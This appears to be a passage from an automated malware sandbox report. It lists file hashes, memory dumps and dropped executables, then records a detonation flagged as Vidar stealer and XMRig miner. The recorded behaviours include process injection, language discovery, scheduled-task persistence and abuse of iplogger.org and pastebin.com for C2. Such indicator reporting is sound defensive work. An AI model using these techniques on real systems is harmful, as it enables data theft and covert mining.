SHA256 9a6c446576e8005dae5b5fb4df7876dea6f09501156e9a5220b60d77b41566d6
SHA512 590777c06b912054ef8722c8195521e1c74bf3f31f7c3b8e9e2b7a14352f25ed0ada8e6751916017bd506af03eb0afea0ca759872a8ff17d5837836fdaf6e774

memory/1864-58-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

\Users\Admin\AppData\Local\Temp\7zSC6A42827\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/1864-75-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1864-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1864-81-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue193858933525b62.exe

MD5 c90e5a77dd1e7e03d51988bdb057bd9f
SHA1 498bd4b07d9e11133943e63c2cf06e28d9e99fc5
SHA256 cca0d3fb3f19615d643d47b3284fe26ffe359c0d2602e5f1877193c1227bfb54
SHA512 bbdfb7452df93c9425eaea10658e662725ee0de1a30993220231c3e8385f09baeabf78484b41e5780602b51e05f28d767d35e5960c18a246d9b1072783cbad34

\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19325eb008c0b950.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19411ac950924ec3f.exe

MD5 26278caf1df5ef5ea045185380a1d7c9
SHA1 df16e31d1dd45dc4440ec7052de2fc026071286c
SHA256 d626180356047eff85c36abbc7a1752c4f962d79070ffc7803b8db2af3be9be5
SHA512 007f092dfef8895e9b4cd3605544df9cd57e701d154ce89f950f8642462b535725edf89b58c0a240bc080a45c9b5229633fe8b2c20e90c7db65bc1e87bc44e03

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19761b3b8d9d.exe

MD5 a2326dff5589a00ed3fd40bc1bd0f037
SHA1 66c3727fb030f5e1d931de28374cf20e4693bbf4
SHA256 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c
SHA512 fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O4ME655FRBIHVU8GHA65.temp

MD5 b9e77e0f9f67e51b998d217d75b67fb6
SHA1 89b32401fc5be2391a57a4770d7ddf8419de6633
SHA256 2a060ef2c0daa42d63bf58ec43e23a02deae6310298f7614944249a0da87b60b
SHA512 7e4c834afbbb5853baf3bb17c82906341aeaab205baf38d3827554e907b3cf595591e3eb793a77e69cd59983e12a9ac3a87da27306e90100fd50600668bc6f08

memory/2212-139-0x00000000012D0000-0x0000000001342000-memory.dmp

memory/596-144-0x0000000000BB0000-0x0000000000BB8000-memory.dmp

memory/3012-171-0x00000000004F0000-0x00000000004F6000-memory.dmp

memory/1876-193-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/2228-194-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2396-197-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-5JAEG.tmp\Tue19879c4c0e.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

C:\Users\Admin\AppData\Local\Temp\is-CBB09.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

C:\Users\Admin\AppData\Local\Temp\is-CBB09.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/2392-142-0x0000000000A80000-0x0000000000AF0000-memory.dmp

memory/3012-140-0x0000000000B20000-0x0000000000B38000-memory.dmp

memory/2988-222-0x0000000002630000-0x0000000002820000-memory.dmp

memory/1156-223-0x0000000000400000-0x0000000002F02000-memory.dmp

memory/1272-241-0x0000000000400000-0x0000000000422000-memory.dmp

memory/304-249-0x0000000000400000-0x0000000000422000-memory.dmp

memory/304-246-0x0000000000400000-0x0000000000422000-memory.dmp

memory/304-245-0x0000000000400000-0x0000000000422000-memory.dmp

memory/304-244-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1272-242-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1272-248-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1272-240-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1272-238-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1272-236-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1272-234-0x0000000000400000-0x0000000000422000-memory.dmp

memory/304-231-0x0000000000400000-0x0000000000422000-memory.dmp

memory/304-228-0x0000000000400000-0x0000000000422000-memory.dmp

memory/304-226-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1864-250-0x0000000064940000-0x0000000064959000-memory.dmp

memory/304-224-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1376-138-0x0000000000080000-0x00000000000F0000-memory.dmp

memory/2396-136-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue1969586bcbf58493.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19879c4c0e.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c1338f41ab.exe

MD5 21a61f35d0a76d0c710ba355f3054c34
SHA1 910c52f268dbbb80937c44f8471e39a461ebe1fe
SHA256 d9c606fa8e99ee0c5e55293a993fb6a69e585a32361d073907a8f8e216d278dd
SHA512 3f33f07aee83e8d1538e5e3d1b723876ddbecc2a730b8eaf7846522f78f5fc6b65ed23085c3a51e62c91dc80b73c171d8f32c44b92cf144689a834e33ea01b3e

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19b4ef3b53293fe.exe

MD5 bf2f6094ceaa5016d7fb5e9e95059b6b
SHA1 25583e0b5a4e331a0ca97b01c5f4ecf6b2388bad
SHA256 47f383df5f55f756468fbb141377bed62056d72d933d675b3c3267d7be4b7f12
SHA512 11d54869e1690824e74e33ee2e9975d28b77730588dde0eee540eefabdedf46576395301aeb607de2cf009b721172209d66a273ca5e3144061c1bdbe41e03f78

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19150ee2be694c8a4.exe

MD5 83552f70e7791687013e0b6e77eef7f4
SHA1 ae6e0e3f2873dd234b4813d4c6a47364111dec8a
SHA256 72e3a9de1b4e4d7f3fc08a1e3071bfa7da14a79eb23fe54f47d6e4c38b3a5c84
SHA512 969b5a9128c5ffff270e0019b5e1bc7b5cd250bf367e7c022aceac0e1496eedf50c657a52083416999ebf59a4eb57827306924febebae1ee9a833a6ad1b5b5c9

memory/2296-278-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2296-276-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2296-275-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2296-274-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2296-272-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2296-270-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2296-268-0x0000000000400000-0x0000000000422000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19f51bcd77a.exe

MD5 363f9dd72b0edd7f0188224fb3aee0e2
SHA1 2ee4327240df78e318937bc967799fb3b846602e
SHA256 e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167
SHA512 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece

\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue1993b3f72c.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c78ded4d176ac.exe

MD5 0c4602580c43df3321e55647c7c7dfdb
SHA1 5e4c40d78db55305ac5a30f0e36a2e84f3849cd1
SHA256 fa02543c043d0ca718baf3dfafb7f5d0c018d46ee6e0f0220095e5874f160752
SHA512 02042264bc14c72c1e8e785812b81dad218e2ecf357db5497e80eabc739c4ad7d9176b6a9e061b909dac1ea188a7ca9e3b1c610c97d52e020ccd947f286dbe11

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue192762f1cd058ddf8.exe

MD5 0b67130e7f04d08c78cb659f54b20432
SHA1 669426ae83c4a8eacf207c7825168aca30a37ca2
SHA256 bca8618b405d504bbfe9077e3ca0f9fdb01f5b4e0e0a12409031817a522c50ac
SHA512 8f5495b850b99f92f18113d9759469768d3e16b4afa8ccdee5504886bced6a9ac75184f7c48f627ead16ce67834f5a641d6cea2cb5420e35c26e612572b12c79

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue19c06f159e0ec.exe

MD5 c1bc0cca3a8784bbc7d5d3e9e47e6ba4
SHA1 500970243e0e1dd57e2aad4f372da395d639b4a3
SHA256 5d1b978e6d2896796f0f63043ecaa1748c1c7245ccda02115afc5594e3f5e3b1
SHA512 929893f5359493bdcf2d2ba9d08a7fe808219c6a93f7f1433d915c520f84a9b03bd2c642722321b9875c1227672ce0773f76220bbde50aadc71754d82ffadbd5

C:\Users\Admin\AppData\Local\Temp\7zSC6A42827\Tue195c40958f528163.exe

MD5 a4bf9671a96119f7081621c2f2e8807d
SHA1 47f50ae20bfa8b277f8c8c1963613d3f4c364b94
SHA256 d9e5cf75da07717a818853d2f1aa79d3d1aaa155bb06fffed3c92ccaf972aef7
SHA512 f0af42f99f09b5c118ebd275d0b905b91d93893034c98b84c370e7243e1b55502585808cfa33a1779d478f6e308eb32f1896d57a5f6fab0edc4362def08a5b0a

memory/1864-284-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1864-283-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/1864-282-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1864-281-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1864-279-0x0000000000400000-0x000000000051C000-memory.dmp

memory/1864-80-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1864-79-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1864-77-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1864-76-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1864-74-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1864-73-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1864-72-0x0000000064940000-0x0000000064959000-memory.dmp

memory/1064-285-0x0000000000400000-0x0000000002F29000-memory.dmp

memory/1964-286-0x0000000000400000-0x00000000016FB000-memory.dmp

memory/1864-71-0x0000000064940000-0x0000000064959000-memory.dmp

memory/1864-70-0x0000000064941000-0x000000006494F000-memory.dmp

memory/1864-65-0x000000006FE40000-0x000000006FFC6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSC6A42827\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/1864-61-0x000000006B440000-0x000000006B4CF000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSC6A42827\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

\Users\Admin\AppData\Local\Temp\7zSC6A42827\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/1864-299-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1864-298-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1864-297-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1864-296-0x0000000064940000-0x0000000064959000-memory.dmp

memory/1864-290-0x0000000000400000-0x000000000051C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabC60D.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Analysis: behavioral32

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:28

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe"

Signatures

Vidar

stealer vidar

Vidar family

vidar

Xmrig family

xmrig

xmrig

miner xmrig

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-21168.tmp\setup.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2956 set thread context of 1200 N/A C:\Users\Admin\AppData\Local\Temp\inst2.exe C:\Users\Admin\AppData\Local\Temp\dYvRarzLqsqwsyXdTu\xKsrHg
PID 4320 set thread context of 4556 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\inst2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-21168.tmp\setup.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Jonba.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\cxl-game.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\e58a3dc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-SGF52.tmp\setup.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\dYvRarzLqsqwsyXdTu\xKsrHg N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\4.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Jonba.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3368 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe
PID 3368 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe
PID 3368 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
PID 3368 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
PID 3368 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
PID 3368 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\inst2.exe
PID 3368 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\inst2.exe
PID 3368 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\inst2.exe
PID 2956 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\inst2.exe C:\Users\Admin\AppData\Local\Temp\dYvRarzLqsqwsyXdTu\xKsrHg
PID 2956 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\inst2.exe C:\Users\Admin\AppData\Local\Temp\dYvRarzLqsqwsyXdTu\xKsrHg
PID 2956 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\inst2.exe C:\Users\Admin\AppData\Local\Temp\dYvRarzLqsqwsyXdTu\xKsrHg
PID 2956 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\inst2.exe C:\Users\Admin\AppData\Local\Temp\dYvRarzLqsqwsyXdTu\xKsrHg
PID 2956 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\inst2.exe C:\Users\Admin\AppData\Local\Temp\dYvRarzLqsqwsyXdTu\xKsrHg
